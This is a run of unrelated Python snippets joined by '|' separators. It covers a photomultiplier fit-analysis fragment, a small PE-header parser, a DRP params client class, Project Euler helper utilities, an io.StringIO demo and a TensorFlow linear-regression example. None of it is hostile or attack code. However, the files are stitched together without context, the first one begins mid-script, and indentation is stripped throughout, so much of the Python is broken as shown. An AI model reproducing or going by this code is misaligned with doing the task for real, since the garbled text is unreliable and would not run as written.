speMean.append(meanS)
mpeSpeMean.append(meanM)
speSigma.append(sigS)
spe_mpeRatio.append(rat)
sigSpeMean=np.array(speSigma).mean()
meanMpeSpeRatio= np.array(spe_mpeRatio).mean()
aveSpeMean=np.array(speMean).mean()
sig_spe=sigSpeMean/aveSpeMean
norm=sig_spe*sig_spe+1
print aveSpeMean
chek=[]
for sn in p.snDict['mpe']:
sigMpe=p.fitDict["mpe","sigma",sn]
meanMpe=p.fitDict["mpe","mean",sn]
rat=sigMpe/(aveSpeMean*norm)
PE.append(rat*rat)
rat2=meanMpe/sigMpe
mean_sig2.append(rat2*rat2)
ratio=rat/rat2
chek.append(ratio*ratio)
p.plotHist("all",320)
raw_input()
#spe=[]
#print p.snDict["spe"]
#for sn in p.snDict["spe"]:
#print str(sn)+" "+str(p.fitDict["spe","mean",sn])
#spe.append(p.fitDict["spe","mean",sn])
#plt.hist(spe)
#plt.show()
#print np.array(PE).mean()
#print np.array(mean_sig2).mean()
#print np.array(chek).mean()
#plt.hist(mean_sig2)
#plt.show()
#plt.hist(chek)
#plt.show()
#p.plotParameter("sig2","sig2")
#p.plotParameter("mpe/spe","mpe/spe")
#p.plotParameter("spe","mean")
#p.plotParameter("spe","sigma")
#p.plotParameter("spe","ratio")
#p.plotParameter("mpe","mean")
#p.plotParameter("mpe","sigma")
#p.plotParameter("best","pe")
#p.plotParameter("mpe","ratio")
#p.plotParameter("back","mean")
#p.plotParameter("back","sigma")
#p.plotParameter("back","ratio")
############
|
#!/usr/bin/python3
#minimalist python pe library
import sys
import argparse
import struct
import PEHeader
class Decoder:
def __init__(self,_filename="",_fileperms="rb"):
self._header = PEHeader.PEHeader()
self.fields = self._header.header_fields
self.fmt_dict = self._header.header_fmt_dict
self.fmt = "".join([self.fmt_dict[name] for name in self.fields])
self.fmt_len = struct.calcsize(self.fmt)
self.len = 0
self.original_file = _filename
self.decoded_file = ""
self.fileperms = _fileperms
def decode(self,_start=0):
self.decoded_file = None
with open(self.original_file,self.fileperms) as raw_pe:
extra = raw_pe.read(_start)
_bytes = raw_pe.read(self.fmt_len)
try:
self.decoded_file = struct.unpack(self.fmt,_bytes)
except struct.error:
self.len = 0
return None,self.len
self.len = len(extra)+len(_bytes)
return self.decoded_file,self.len
def decode_field(self,index):
return self.fields[index]
|
# Copyright 2018 Cable Television Laboratories, Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from drp_python.exceptions.http_exceptions import AuthorizationError, \
ConnectionError
from drp_python.exceptions.drb_exceptions import NotFoundError, \
AlreadyExistsError
from drp_python.translation_layer.params_translation import \
ParamsTranslation, get_all_params
import logging
logger = logging.getLogger('drp-params')
class Params:
"""
Client Params Object
"""
def __init__(self, session, client_params):
logger.debug('__init__')
self.__params_config = client_params
self.__api = ParamsTranslation(session)
self.__api.open()
try:
self.__params_model = self.get()
except NotFoundError:
self.__params_model = None
def is_valid(self):
return self.__params_model is not None
def create(self):
logger.debug('create')
if self.__params_model:
raise AlreadyExistsError(self.__params_model.name,
'Params with that name already exists')
else:
self.__params_model = self.__api.create_params(
self.__params_config)
def update(self, updated_object):
if self.__params_model:
self.__params_model = self.__api.update_params(
updated_object, self.__params_model.name)
else:
self.__params_model = self.__api.create_params(
updated_object)
def delete(self):
if self.__params_model:
self.__api.delete_params(self.__params_model.name)
self.__params_model = None
def get(self):
return self.__api.get_params(self.__params_config.name)
def set_machine_param(self, machine):
machine.add_param_values(self.__params_config)
def get_all(session):
"""
    Fetches all params from DRP
Note this data is not cached
:return: List of Params
"""
try:
params_list = get_all_params(session)
return params_list
except ConnectionError as error:
logger.error(error)
raise error
except AuthorizationError as error:
logger.error(error)
raise error
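# Hedged usage sketch (session and client_params are constructed elsewhere; the
# names below are placeholders):
#
#   params = Params(session, client_params)
#   if not params.is_valid():
#       params.create()
#   everything = get_all(session)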
|
# -*- coding: utf-8 -*-
"""
utils.py
Utility functions using to analysis and evaluate solutions
Function list:
timepast
memoize
clear_cython_cache
find_solution
generate_catalogue_draft
find_keyword_in_solutions
@author: Jasper Wu
"""
import os
import functools
import shutil
import time
import webbrowser
import inspect
from inspect import getmembers, signature
def timepast(func):
@functools.wraps(func)
def _deco(*args, **kwargs):
t = time.time()
print("Func {0}() begins at: {1}".format(func.__name__, time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(t))))
ret = func(*args, **kwargs)
print("Time consumed by {0}(): {1:.2f}s".format(func.__name__, time.time() - t))
return ret
return _deco
def memoize(cache={}, key=lambda x: x):
    def _deco(func):
        @functools.wraps(func)
        def __deco(*args, **kwargs):
            idx = key(args)
            if idx not in cache:
                cache[idx] = func(*args, **kwargs)
            return cache[idx]
        return __deco
    return _deco
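# Hedged usage sketch (fib is a made-up example, not part of this module):
#
#   @memoize(key=lambda args: args[0])
#   def fib(n):
#       return n if n < 2 else fib(n - 1) + fib(n - 2)
#
#   fib(80)  # repeated calls with the same argument are answered from the cache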
def clear_cython_cache():
url = os.path.expanduser("~\\.ipython\\cython")
if os.path.exists(url):
for f in os.listdir(url):
filepath = os.path.join(url, f)
if '.' in f:
os.remove(filepath)
else:
shutil.rmtree(filepath)
else:
raise ValueError("Cython cache not found: {}".format(url))
def generate_catalogue_draft(module):
def print_func_info(name, func):
try:
sig = str(signature(func))
except:
sig = "(<unknown>)"
name += sig
doc = func.__doc__
if not doc:
doc = name + "\n"
elif sig == "(<unknown>)":
doc = "{}\n".format(doc.replace("\n\n", "\n").replace("\n", "\n "))
elif not doc.startswith("\n"):
doc = "{}\n {}\n".format(name, doc)
else:
doc = name + doc
print(doc)
blocklist = ["Rational", "Symbol", "deepcopy"]
basic_pool = dict(getmembers(module, inspect.isfunction))
basic_pool.update(dict(getmembers(module, inspect.isbuiltin)))
basic_pool.update(dict(getmembers(module, inspect.isclass)))
print("{}:\n".format(module.__name__))
for name in sorted(basic_pool):
print_func_info(name, basic_pool[name])
for submodule_name in ["equation", "linalg", "numclass", "polynomial"]:
submodule = getattr(module, submodule_name)
print("\n{}:\n".format(submodule.__name__))
pool = getmembers(submodule, inspect.isfunction) + \
getmembers(submodule, inspect.isbuiltin) + \
getmembers(submodule, inspect.isclass)
for name, func in sorted(pool):
if name not in basic_pool and name not in blocklist and not name.startswith("_"):
print_func_info(name, func)
def find_keyword_in_solutions(keyword, folder=r"E:\Project Euler\ProjectEulerSolutions"):
keyword = keyword.lower()
solutions = [file for file in os.listdir(folder) if file.endswith("ipynb")]
check = []
for file in solutions[::-1]:
with open(os.path.join(folder, file), 'r', encoding="utf-8") as data:
data = data.readlines()
for i, line in enumerate(data):
if keyword in line.lower():
check.append(file.replace("ipynb", "html"))
break
for file in check:
print(file)
def find_solution(id):
if id % 10 == 0:
lid, rid = id-9, id
else:
lid, rid = id // 10 * 10 + 1, id // 10 * 10 + 10
# webbrowser.open('http://htmlpreview.github.io/?https://github.com/ColdHumour/ProjectEulerSolutions/blob/master/Solutions%20{}-{}.html#{}'.format(lid, rid, id))
webbrowser.open('file:///E:/Project Euler/ProjectEulerSolutions/Solutions%20{}-{}.html#{}'.format(lid, rid, id))
|
import io
s = io.StringIO()
s.write(u'Hello World\n')
print('This is a test', file=s)
print(s.getvalue())
s = io.StringIO(u'Hello World\n')
print(s.read(4))
print(s.read())
s = io.BytesIO()
s.write(b'binary data')
print(s.getvalue())
|
import tensorflow as tf
tf.set_random_seed(777)
w = tf.Variable(tf.random_normal([1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
x = tf.placeholder(tf.float32, shape=[None])
y = tf.placeholder(tf.float32, shape=[None])
hypothesis = x * w + b
# cost / loss function
cost = tf.reduce_mean(tf.square(hypothesis - y))
# optimizer
train = tf.train.GradientDescentOptimizer(learning_rate = 0.01).minimize(cost)
# Launch the graph in a session
with tf.Session() as sess:
#Initializes global variables in the graph
sess.run(tf.global_variables_initializer())
#Fit the Line
for step in range(2001):
        _, cost_val, w_val, b_val = sess.run([train, cost, w, b],
                                             feed_dict={x:[1,2,3,4,5], y:[2.1, 3.1, 4.1, 5.1, 6.1]})
if step % 20 == 0:
print(step, cost_val, w_val, b_val )
#Testing our model #predict
print(sess.run(hypothesis, feed_dict={x:[5]}))
print(sess.run(hypothesis, feed_dict={x:[2.5]}))
print(sess.run(hypothesis, feed_dict={x:[1.5, 3.5]}))
|